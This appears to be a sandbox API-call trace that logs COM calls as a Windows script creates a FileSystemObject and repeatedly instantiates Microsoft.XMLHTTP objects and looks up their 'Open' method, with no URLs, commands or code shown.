	[0401.266] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0401.266] SysStringLen (param_1=0x0) returned 0x0
	[0401.266] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0401.269] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0401.269] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0401.270] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0401.270] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0401.270] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0401.270] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0401.699] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0401.699] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0401.699] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0401.701] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0401.701] SysStringLen (param_1=0x0) returned 0x0
	[0401.701] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0401.701] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0401.701] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0401.701] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0401.701] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0401.701] ??2@YAPEAX_K@Z () returned 0x62f310
	[0401.701] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0401.701] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0401.701] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0401.701] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0401.701] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0401.701] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0401.701] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0401.704] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0401.704] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0401.704] SysStringLen (param_1=0x0) returned 0x0
	[0401.704] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0401.704] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0401.704] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0401.704] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0401.704] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0401.705] ??2@YAPEAX_K@Z () returned 0x62f330
	[0401.705] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0401.705] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0401.705] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0401.705] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0401.705] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0401.705] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0401.705] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0401.705] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0401.705] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0401.705] SysStringLen (param_1=0x0) returned 0x0
	[0401.705] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0401.705] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0401.705] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c50) returned 0x0
	[0401.706] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0401.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7498) returned 0x0
	[0401.706] ??2@YAPEAX_K@Z () returned 0x62f310
	[0401.706] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7498, pUnkSite=0x62f310) 
	[0401.706] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0401.706] XMLHTTPRequest:IUnknown:Release (This=0x49c7498) returned 0x0
	[0401.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c50) returned 0x0
	[0401.706] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c50) returned 0x3
	[0401.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0401.706] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0401.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0401.706] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0401.706] SysStringLen (param_1=0x0) returned 0x0
	[0401.706] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0401.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0401.706] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0401.706] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0401.707] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0401.707] ??2@YAPEAX_K@Z () returned 0x62f330
	[0401.707] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0401.707] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0401.707] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0401.707] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0401.707] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0401.707] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0401.707] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0401.707] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0401.707] longjmp () 
	[0401.707] longjmp () 
	[0401.707] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0401.707] SysStringLen (param_1=0x0) returned 0x0
	[0401.707] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0401.708] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0401.708] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7510) returned 0x0
	[0401.708] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0401.708] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0401.708] ??2@YAPEAX_K@Z () returned 0x62f310
	[0401.708] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0401.708] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0401.708] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0401.708] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7510) returned 0x0
	[0401.708] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7510) returned 0x3
	[0401.708] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0401.708] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0401.708] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0401.708] longjmp () 
	[0401.708] longjmp () 
	[0401.708] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0401.708] SysStringLen (param_1=0x0) returned 0x0
	[0401.708] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0401.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0401.709] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0401.709] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
